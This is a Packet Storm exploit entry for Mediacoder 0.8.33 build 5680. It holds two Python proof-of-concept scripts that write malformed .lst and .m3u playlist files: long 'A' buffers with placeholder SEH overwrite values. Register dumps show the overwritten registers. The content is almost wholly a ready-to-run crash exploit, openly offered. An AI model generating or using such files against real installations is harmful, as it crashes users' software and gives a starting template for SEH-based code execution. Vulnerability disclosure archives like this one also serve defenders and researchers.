Mediacoder 0.8.33 Build 5680 Buffer Overflow / DoS

2014-12-17T00:00:00
ID PACKETSTORM:129629
Type packetstorm
Reporter Hadji Samir
Modified 2014-12-17T00:00:00

Description

                    
                      `# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst) 
# Date: 11/29/2010 
# Author: Hadji Samir s-dz@hotmail.fr 
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe 
# Version: 0.8.33 build 5680 
 
EAX 0012E788 
ECX 43434343 
EDX 00000000 
EBX 43434343 
ESP 0012E724 
EBP 0012E774 
ESI 0012E788 
EDI 00000000 
 
#!/usr/bin/python 
 
buffer = ("http://" + "A" * 845) 
nseh = ("B" * 4) 
seh = ("C" * 4) 
junk = ("D" * 60) 
 
f= open("exploit.lst",'w') 
f.write(buffer + nseh + seh + junk) 
f.close() 
 
------------------- 
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u) 
# Date: 11/29/2010 
# Author: Hadji Samir s-dz@hotmail.fr 
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe 
# Version: 0.8.33 build 5680 
 
EAX 0012E508 
ECX 43434343 
EDX 00000000 
EBX 43434343 
ESP 0012E4A4 
EBP 0012E4F4 
ESI 0012E508 
EDI 00000000 
 
#!/usr/bin/python 
buffer = ("http://" + "A" * 845) 
nseh = ("B" * 4) 
seh = ("C" * 4) 
junk = ("D" * 60) 
 
f= open("exploit.m3u",'w') 
f.write(buffer + nseh + seh + junk) 
f.close() 
 
`